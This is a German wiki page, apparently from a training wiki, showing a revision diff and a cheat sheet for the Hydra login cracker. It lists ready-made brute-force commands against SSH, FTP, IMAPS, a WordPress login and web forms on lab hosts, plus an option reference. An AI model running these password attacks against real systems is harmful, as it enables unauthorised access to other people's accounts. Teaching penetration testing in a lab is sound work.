Hydra: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(→hydra) |
|||
| Zeile 2: | Zeile 2: | ||
[[Hydra]] ist ein schneller Login-Cracker für Netzwerkprotokolle und Webformulare. | [[Hydra]] ist ein schneller Login-Cracker für Netzwerkprotokolle und Webformulare. | ||
'''bad-passwords''' ist die Datei mit den zu testenden Passwörtern. | '''bad-passwords''' ist die Datei mit den zu testenden Passwörtern. | ||
| + | *wget https://xinux.de/downloads/bad-passwords | ||
'''xinux''' ist der Benutzername. | '''xinux''' ist der Benutzername. | ||
Aktuelle Version vom 9. April 2025, 06:17 Uhr
hydra
Hydra ist ein schneller Login-Cracker für Netzwerkprotokolle und Webformulare. bad-passwords ist die Datei mit den zu testenden Passwörtern.
xinux ist der Benutzername.
SSH
- hydra -l xinux -P bad-passwords 10.0.10.104 ssh
FTP
- hydra -l xinux -P bad-passwords 10.0.10.104 ftp
IMAPS
- hydra -S -v -l xinux -P bad-passwords -s 993 -f 10.0.10.104 imap -V
WordPress (http-post-form)
- hydra -l admin -P bad-passwords opfer.secure.local -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Typischer Webformular-Test (allgemein)
- hydra -L users.txt -P bad-passwords 10.0.10.104 http-post-form '/login.php:user=^USER^&pass=^PASS^:F=Login failed'
Optionen
- -l Benutzername
- -L Datei mit Benutzernamen
- -p Einzelnes Passwort
- -P Datei mit Passwörtern
- -s Port (z. B. 993 für IMAPS)
- -S SSL aktivieren
- -t Threads (Standard 16)
- -v / -V Ausführliche Ausgabe
- -f Beendet Scan nach erstem gültigem Login
- -o Ergebnis-Ausgabe in Datei
- -I Ignoriert Zeitüberschreitungen
- -w 5 Wartezeit (Timeout) auf Antwort in Sekunden
Hinweise
- Einige Dienste (z. B. SSH, IMAPS) blockieren nach wenigen Fehlversuchen → -f empfiehlt sich
- Bei Webformularen muss die Antwort geprüft werden: F=Fehlertext oder S=Redirect
- SSL bei Webformularen erfolgt automatisch über URL oder durch Angabe von https://